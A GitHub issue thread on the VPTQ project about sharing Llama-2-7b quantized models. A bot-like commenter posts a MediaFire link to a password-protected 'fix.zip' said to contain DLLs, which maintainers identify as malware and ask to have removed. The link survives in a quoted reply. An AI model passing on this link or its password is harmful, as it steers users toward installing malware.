### ISSUE TITLE
Llama-2-7b models

### ISSUE THREAD

**Issue by laomao0** [microsoft/VPTQ#26]
Can you share Llama-2-7b models?
Thanks.

**Comment by SagarChandra07** [comment]
try this
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Archive codepass: changeme
I put the necessary dlls in the archive

**Comment by laomao0** [comment]
> try this https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file Archive codepass: changeme I put the necessary dlls in the archive

what?

**Comment by OpenSourceRonin** [comment]
Hi @laomao0,
I am trying to reproduce the results on llama-2; please wait for us. I will release models at [VPTQ-community](https://huggingface.co/VPTQ-community) .

> Can you share Llama-2-7b models? Thanks.

**Comment by laomao0** [comment]
> Hi @laomao0, I am trying to reproduce the results on llama-2; please wait for us. I will release models at [VPTQ-community](https://huggingface.co/VPTQ-community) .
> 
> > Can you share Llama-2-7b models? Thanks.

thanks

**Comment by OpenSourceRonin** [comment]
Hi @laomao0,

I have successfully reproduced most of the results from the tech report. Please refer to [reproduced collection](https://huggingface.co/collections/VPTQ-community/reproduced-vptq-tech-report-baseline-66fbf1dffe741cc9e93ecf04) for details. 

The results I reproduced are for reference only, and you should be responsible for application and use.

Thanks!

**Comment by OpenSourceRonin** [comment]
Hi @laomao0,
By the way, could you help me delete your reply containing the malware URL? It seems that GitHub has already deleted the original post, but the URL still exists in your reply. I would like to avoid spreading any malware.

**Comment by YangWang92** [comment]
Remove malware URL from bots.
